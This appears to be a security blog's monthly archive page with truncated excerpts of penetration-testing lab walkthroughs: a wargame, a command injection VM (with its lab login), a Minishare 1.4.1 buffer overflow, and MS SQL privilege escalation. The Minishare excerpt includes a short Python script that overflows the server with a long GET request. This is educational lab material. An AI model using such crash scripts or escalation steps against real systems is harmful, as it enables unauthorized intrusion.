Posts

Showing posts from July, 2015

Whitehat Wargame websecurity challenges

Image
Walkthrough of some Web security challenges that are present at Whitehat wargame
https://wargame.whitehat.vn/Challenges/List/2

Note: It is the walkthrough of challenge that is present not at the above link.
It is not a CTF
WebSecurity Challenge Web001


Pentester Academy Command Injection ISO basilic 1.5.14 exploit

Image
Pentester academy has launched a Command Injection ISO virtual image of Ubuntu with lots of real world vulnerable application framework.

Refer the following link for download and information purpose:
https://www.vulnhub.com/entry/command-injection-iso-1,81/
http://www.pentesteracademy.com/course?id=12

Lab setup:
1) Kali linux (Bridged or NAT) . My Kali Linux Ip was 192.168.1.102
2) Command Injection ISO (Bridged or NAT). My target IP was 192.168.1.103

Login into command injection ISO with user name securitytube and password 123321 to check for the DHCP ip address allocated or simply do a ping scan (nmap -sn)

Checking out for port 80 on Command Injection ISO (192.168.1.103)


Minishare 1.4.1 Bufferoverflow

Image
You can download the server from:
https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0

Exploit code in ruby:
https://www.exploit-db.com/exploits/616/

The vulnerability is a long URL in the GET request.
Eg:- GET AAAAAAAAAAAAAAAA..... HTTP/1.1

Lab Setup: 1) Windows xp ( I am using windows xp sp1)
2) Immunity debugger installed on the windows xp machine.
3) Minishare 1.4.1 installed on windows xp running on port 80.
2) Kali linux for scripting and exploiting.

Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below.


Generate Sample script to crash: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script.

#!/usr/share/python
import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
buff="GET "
buff+="A"*2000
buff+=" HTTP/1.1\r\n\r\n"
s.send(buff)
s.close()


Execute the exploit.It is observed t…

MS SQL Pentest

Image
In few of me internal pentest engagement I was able to enumerate IP and credentials of database server, either by brute-forcing or searching the code for database connect string.

     In last 6months I got the database credentials twice in client side code excluding the successful brute-force.

    Previously when I use to get the credentials, I try to connect the server using a local client. Eg. If I get credentials of MS SQL Server then I download some client for it and try to view the database.

    This time I was not really interested in doing that. Instead I was thinking to escalate my privilege and do something more than just viewing the database, because when I was reading the walk-through of Kioptrix it states that we can gain code execution using some commands executing in sql format.

   So I googled ways to enumerate mssql and I got a very good link https://www.offensive-security.com/metasploit-unleashed/admin-mssql-auxiliary-modules/